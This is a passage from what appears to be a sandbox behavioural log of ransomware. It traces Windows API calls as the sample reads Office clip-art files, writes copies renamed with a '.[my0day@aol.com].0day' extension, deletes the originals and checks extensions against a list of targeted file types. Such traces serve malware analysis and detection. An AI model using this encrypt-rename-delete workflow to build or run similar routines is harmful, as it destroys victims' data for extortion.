dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.399] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.399] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0052.400] GetLastError () returned 0x0 [0052.400] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x47a, lpOverlapped=0x0) returned 1 [0052.401] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x480, lpOverlapped=0x0) returned 1 [0052.402] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.402] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.402] SetEndOfFile (hFile=0x16c) returned 1 [0052.402] CloseHandle (hObject=0x16c) returned 1 [0052.402] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.402] SetEndOfFile (hFile=0x190) returned 1 [0052.403] CloseHandle (hObject=0x190) returned 1 [0052.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0052.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.403] lstrlenW (lpString=".doc") returned 4 [0052.403] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.403] lstrlenW (lpString=".docx") returned 5 [0052.403] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.403] lstrlenW (lpString=".pdf") returned 4 [0052.404] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString=".xls") returned 4 [0052.404] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString=".xlsx") returned 5 [0052.404] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.404] lstrlenW (lpString=".ppt") returned 4 [0052.404] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.404] lstrlenW (lpString=".zip") returned 4 [0052.404] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString=".rar") returned 4 [0052.404] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString=".bz2") returned 4 [0052.404] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.404] lstrlenW (lpString=".7z") returned 3 [0052.404] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.404] lstrlenW (lpString=".dbf") returned 4 [0052.404] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.404] lstrlenW (lpString=".1cd") returned 4 [0052.404] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.404] lstrlenW (lpString=".jpg") returned 4 [0052.404] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.404] lstrlenW (lpString=".doc") returned 4 [0052.404] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.404] lstrlenW (lpString=".docx") returned 5 [0052.404] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.404] lstrlenW (lpString=".pdf") returned 4 [0052.404] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString=".xls") returned 4 [0052.404] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.404] lstrlenW (lpString=".xlsx") returned 5 [0052.405] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.405] lstrlenW (lpString=".ppt") returned 4 [0052.405] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.405] lstrlenW (lpString=".zip") returned 4 [0052.405] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.405] lstrlenW (lpString=".rar") returned 4 [0052.405] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.405] lstrlenW (lpString=".bz2") returned 4 [0052.405] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.405] lstrlenW (lpString=".7z") returned 3 [0052.405] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.405] lstrlenW (lpString=".dbf") returned 4 [0052.405] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.405] lstrlenW (lpString=".1cd") returned 4 [0052.405] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0052.405] lstrlenW (lpString=".jpg") returned 4 [0052.405] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.405] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0052.405] lstrlenW (lpString="AG00161_.GIF") returned 12 [0052.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.405] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=7583) returned 1 [0052.405] CloseHandle (hObject=0x190) returned 1 [0052.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 0x20 [0052.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.406] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.406] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0052.406] GetLastError () returned 0x0 [0052.406] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1d9f, lpOverlapped=0x0) returned 1 [0052.407] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1da0, lpOverlapped=0x0) returned 1 [0052.408] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.408] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.408] SetEndOfFile (hFile=0x16c) returned 1 [0052.409] CloseHandle (hObject=0x16c) returned 1 [0052.409] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.409] SetEndOfFile (hFile=0x190) returned 1 [0052.410] CloseHandle (hObject=0x190) returned 1 [0052.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0052.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.410] lstrlenW (lpString=".doc") returned 4 [0052.410] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.410] lstrlenW (lpString=".docx") returned 5 [0052.410] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.410] lstrlenW (lpString=".pdf") returned 4 [0052.410] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.410] lstrlenW (lpString=".xls") returned 4 [0052.410] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.410] lstrlenW (lpString=".xlsx") returned 5 [0052.410] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.410] lstrlenW (lpString=".ppt") returned 4 [0052.410] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.410] lstrlenW (lpString=".zip") returned 4 [0052.410] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.410] lstrlenW (lpString=".rar") returned 4 [0052.410] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.410] lstrlenW (lpString=".bz2") returned 4 [0052.410] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.411] lstrlenW (lpString=".7z") returned 3 [0052.411] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.411] lstrlenW (lpString=".dbf") returned 4 [0052.411] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.411] lstrlenW (lpString=".1cd") returned 4 [0052.411] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.411] lstrlenW (lpString=".jpg") returned 4 [0052.411] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.411] lstrlenW (lpString=".doc") returned 4 [0052.411] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.411] lstrlenW (lpString=".docx") returned 5 [0052.411] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.411] lstrlenW (lpString=".pdf") returned 4 [0052.411] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.411] lstrlenW (lpString=".xls") returned 4 [0052.411] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.411] lstrlenW (lpString=".xlsx") returned 5 [0052.411] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.411] lstrlenW (lpString=".ppt") returned 4 [0052.411] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.411] lstrlenW (lpString=".zip") returned 4 [0052.411] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.411] lstrlenW (lpString=".rar") returned 4 [0052.411] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.411] lstrlenW (lpString=".bz2") returned 4 [0052.411] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.411] lstrlenW (lpString=".7z") returned 3 [0052.411] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.412] lstrlenW (lpString=".dbf") returned 4 [0052.412] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.412] lstrlenW (lpString=".1cd") returned 4 [0052.412] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0052.412] lstrlenW (lpString=".jpg") returned 4 [0052.412] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.412] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0052.412] lstrlenW (lpString="AG00163_.GIF") returned 12 [0052.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0053.848] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=6984) returned 1 [0053.848] CloseHandle (hObject=0x23c) returned 1 [0053.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 0x20 [0053.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0053.849] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.849] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.849] GetLastError () returned 0x0 [0053.849] ReadFile (in: hFile=0x23c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1b48, lpOverlapped=0x0) returned 1 [0053.852] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1b50, lpOverlapped=0x0) returned 1 [0053.853] ReadFile (in: hFile=0x23c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.853] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.853] SetEndOfFile (hFile=0x240) returned 1 [0053.853] CloseHandle (hObject=0x240) returned 1 [0053.853] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.853] SetEndOfFile (hFile=0x23c) returned 1 [0053.854] CloseHandle (hObject=0x23c) returned 1 [0053.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0053.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.854] lstrlenW (lpString=".doc") returned 4 [0053.854] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.854] lstrlenW (lpString=".docx") returned 5 [0053.854] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.854] lstrlenW (lpString=".pdf") returned 4 [0053.854] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.854] lstrlenW (lpString=".xls") returned 4 [0053.854] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.854] lstrlenW (lpString=".xlsx") returned 5 [0053.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.855] lstrlenW (lpString=".ppt") returned 4 [0053.855] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.855] lstrlenW (lpString=".zip") returned 4 [0053.855] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.855] lstrlenW (lpString=".rar") returned 4 [0053.855] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.855] lstrlenW (lpString=".bz2") returned 4 [0053.855] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.855] lstrlenW (lpString=".7z") returned 3 [0053.855] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.855] lstrlenW (lpString=".dbf") returned 4 [0053.855] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.855] lstrlenW (lpString=".1cd") returned 4 [0053.855] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.855] lstrlenW (lpString=".jpg") returned 4 [0053.855] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.855] lstrlenW (lpString=".doc") returned 4 [0053.855] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.855] lstrlenW (lpString=".docx") returned 5 [0053.855] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.855] lstrlenW (lpString=".pdf") returned 4 [0053.855] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.855] lstrlenW (lpString=".xls") returned 4 [0053.855] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.855] lstrlenW (lpString=".xlsx") returned 5 [0053.855] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.855] lstrlenW (lpString=".ppt") returned 4 [0053.855] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.856] lstrlenW (lpString=".zip") returned 4 [0053.856] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.856] lstrlenW (lpString=".rar") returned 4 [0053.856] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.856] lstrlenW (lpString=".bz2") returned 4 [0053.856] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.856] lstrlenW (lpString=".7z") returned 3 [0053.856] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.856] lstrlenW (lpString=".dbf") returned 4 [0053.856] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.856] lstrlenW (lpString=".1cd") returned 4 [0053.856] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.856] lstrlenW (lpString=".jpg") returned 4 [0053.856] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.856] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0053.856] lstrlenW (lpString="AN00015_.WMF") returned 12 [0053.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0053.856] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=4734) returned 1 [0053.856] CloseHandle (hObject=0x23c) returned 1 [0053.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 0x20 [0053.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0053.857] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.857] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, 